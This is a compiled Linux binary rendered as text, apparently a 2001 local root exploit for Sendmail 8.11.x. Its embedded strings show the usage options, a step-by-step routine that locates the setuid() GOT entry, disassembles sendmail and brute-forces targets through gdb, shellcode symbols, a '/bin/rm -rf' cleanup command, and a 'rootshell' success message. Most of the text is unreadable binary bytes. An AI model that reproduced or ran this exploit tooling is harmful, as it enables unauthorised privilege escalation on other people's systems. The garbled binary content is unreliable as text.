ELF4(4 (444### %((( Qtd/lib/ld-linux.so.2GNU%* (&'!%) "  $ #X:-hxp::a#ZTȈ3؈&<kF{(:[8 H#XhAxL'Su6Aȉ:n؉b94(8CH5MiX:h4x{ 0libc.so.6strcpystdoutexecvefscanffgetsexeclpcloseperrordup2systemoptargfflushpopenfprintfkillstrcatchdirwaitsetgidsignalsetenvforksscanfgetoptmemsetgetppidgetcwdsprintffcloseaccessexitfopen_IO_stdin_used__libc_start_mainstrlensetuidmkdir__xstat__gmon_start__GLIBC_2.1GLIBC_2.0ii +ii 5("      $(,048<@DHLPTX\`d h!l$p%t&x'|)Uk5%%h%h%h%h%h %h(%h0%h8p% h@`%hHP%hP@%hX0%h` % hh%$hp%(hx%,h%0h%4h%8h%<h%@h%Dh%Hhp%Lh`%PhP%Th@%Xh0%\h %`h%dh%hh%lh%ph%th%xh%|h 1^PTRhHhQVh_US[ +PtЋ]ÐU=u)tҡuÉUܵtt hܵЃÐUUhhP P}x ueUWDf f{"{{h }Phh}P.h}PrUE )Љ{{{}uhE{ {{{h%zP zP{PD{{{E(됍{ PHƄ({E{{{Dž{}{Dž{{P{Pu}Uuh0U jUWV7)čX󤍽 Dž`DžX DžTE 8jjjj j jj RPI hX 5 hX hjhhjhh hZhOu uhhuihb<<2<8=t'XPhZ5u{ E 0@ =t'`PhZ5u0 E 0@v =u E 0@R 5P=u E 0Q@ 5hT E 0@Tt h`ƅE 8/thP E 0Phhh \ jhDj  j\h`XPh PP%uPhjPyPhhhy h, jhhKBPh[hcPhzP[Ph|Ht.  h j( hhhPPPhȠT 5#PPhP P?jP;y h jM hPh 5Tu5h$Xh$Ph[h,P ( h$Ph[hP hzPuDžhhPuDžLPtPPPPPPPpPhP0 qDžPP;h|5PU-6;tuLP뻃LhUЍth‰UЍpBh hhסhh 5hhhPDžtDždd;h|/hPu h judU-60dU-6ph8h  PPhXh\P hzPu h|G jdU-6@hHPLLu[ lPPpPhL udUЍlBt odU-6x9`dU-6pdЍЍЙh44dh 5LLuK jJ`\PdU-6pP9 DžDD=t5 DžDD hܢ- j@d h jl@e^_ÐUWVS [)19sאF9r [^_UVS[Î)ɍqu ^[^ÉNuUSu u[Ej]ÐUSR̵̵t ЋuX[US[R]/bin/rm -rf %s > /dev/null 2> /dev/null-dEGG=%u-%u.%u-%s [command] [options] -h this help -d specify depth of analysis (default=32) -o change offset (default = -32000) -v specify victim (default /usr/sbin/sendmail) -t specify temp directory (default /tmp/.sxp) -b enables bruteforce (WARNING: this may take about 20-30 minutes!) /usr/sbin/sendmail Voila babe, entering rootshell! Enjoy! //usr/bin/id/dev/nullBASH_HISTORY-bash/bin/bash ...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ hd:o:v:t:b%d[*] Using brute force, this may take some time %s%s/%s[*] Victim = %s [*] Depth = %d [*] Offset = %d [*] Temp = %s [*] ESP = 0x%08x [-] Bad: %s isn't suid ;( [-] Bad: We haven't access to %s ! [-] Can't create our tempdir! [+] Created %s objdump%s -R %s | grep setuidr%x[-] Cannot get setuid() GOT [+] Step 1. setuid() got = 0x%08x %s/sm[*] Step 2. Copying %s to %s.../bin/cp -f %s %sFailedOK [*] Step 3. Disassembling %s...grep%s -d %s 2> /dev/null | %s -B %d "mov.*%%.l,(%%e..,%%e..,1)" | %s ".mov .*0x80.*,%%e.."%s -d %s 2> /dev/null | %s ".mov .*0x80.*,%%e.."%x: %s %s %s %s %s %s 0x%x,%s OK, found %d targets [*] Step 4. Exploiting %d targets: %s/gdbw+Cannot create gdb script break *0x%x r -d1-1.1 x/x 0x%x gdb%s -batch -x %s %s 2> /dev/nullFailed to spawn gdb! 0x%x %s 0x%x[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d Thanx for choosing sd's products ;) [-] All targets failed, probably not vulnerable ;(            1     |ص [1P ̀/usr/sbin/sendmail/tmp/.sxp 0 ԙH, ? (oool^n~Έވ.>N^n~Ήމ.>N^n~GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-32)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-32)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-32).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.data.dynamic.ctors.dtors.jcr.got.bss.comment#(( 1HHD7 ?,,?GollTTo0c l ( u00pHH`{ ,ԙ ##d %̵%Ե%ܵ%%&  &8',p, P4+(H,l 0 H  ԙ ̵Եܵ̊ ̵*Ե8KܵX\h ~, еصܵ X:$  h xp#:5#HZXjȈ|؈&" <HD k {(:.0 48EH#WT _XrhA xLS6H _   %BSȉ:c؉u[J | 9ԙ "" 4(*Գ08CBH5SfxX:h4 xD   0call_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____EH_FRAME_BEGIN____JCR_LIST__p.0completed.1__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxsmail.cmkdir@@GLIBC_2.0useexecl@@GLIBC_2.0_DYNAMICclose@@GLIBC_2.0_fp_hwperror@@GLIBC_2.0fprintf@@GLIBC_2.0fork@@GLIBC_2.0signal@@GLIBC_2.0fflush@@GLIBC_2.0pclose@@GLIBC_2.1__fini_array_endshellcode__statsetenv@@GLIBC_2.0__dso_handle__libc_csu_finiexecve@@GLIBC_2.0ourdirsetgid@@GLIBC_2.0system@@GLIBC_2.0access@@GLIBC_2.0_initpopen@@GLIBC_2.1fscanf@@GLIBC_2.0get_espgetppid@@GLIBC_2.0stdout@@GLIBC_2.0__xstat@@GLIBC_2.0_startgetopt@@GLIBC_2.0fgets@@GLIBC_2.0chdir@@GLIBC_2.0strlen@@GLIBC_2.0__fini_array_start__libc_csu_init__bss_startmainscodesploit__libc_start_main@@GLIBC_2.0__init_array_enddup2@@GLIBC_2.0strcat@@GLIBC_2.0giveupdata_startprintf@@GLIBC_2.0_finifclose@@GLIBC_2.1__preinit_array_endexploitedexit@@GLIBC_2.0statsscanf@@GLIBC_2.0_edata_GLOBAL_OFFSET_TABLE__endgetcwd@@GLIBC_2.0dvictmemset@@GLIBC_2.0fopen@@GLIBC_2.1__init_array_startoptarg@@GLIBC_2.0_IO_stdin_usedkill@@GLIBC_2.0sprintf@@GLIBC_2.0__data_start_Jv_RegisterClasses__preinit_array_startsetuid@@GLIBC_2.0sigusrwait@@GLIBC_2.0__gmon_start__strcpy@@GLIBC_2.0